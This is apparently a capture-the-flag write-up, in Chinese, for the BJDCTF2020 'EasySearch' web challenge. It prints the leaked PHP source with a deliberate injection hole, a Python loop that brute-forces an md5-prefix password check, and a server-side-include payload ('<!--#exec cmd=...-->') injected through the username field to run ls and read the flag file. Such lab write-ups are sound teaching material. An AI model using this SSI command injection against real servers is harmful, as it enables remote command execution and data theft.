[BJDCTF2020]EasySearch

首页长这样

为什么两个框框的placeholder都是username啊喂==

猜密码没猜中，快进到下一步

使用dirsearch扫目录

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

这个***不会是手残把墨水滴💾上造成的吧QwQ

先绕过第一个if

from hashlib import md5

i = 0
while True:
    if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
        print(i)
        break
    i = i + 1

2020666

接下来服务端在public目录下面写入了一个随机名字的shtml文件

[!] Header error ...暗示要去看响应头

然后是shtml的新知识

总之就是可以利用这个

<!--#exec cmd="ls -l" -->

来执行命令

这里通过username注入

ls

ls ..

cat ../flag_990c66bf85a09c664f0b6741840499b2

#Web #PHP #HTTP #Header #RCE #SHTML #HTML #目录扫描 #md5

> Passions & dreams like sora, *zipped* up in my heart

[BJDCTF2020]EasySearch

> Passions & dreams like sora, zipped up in my heart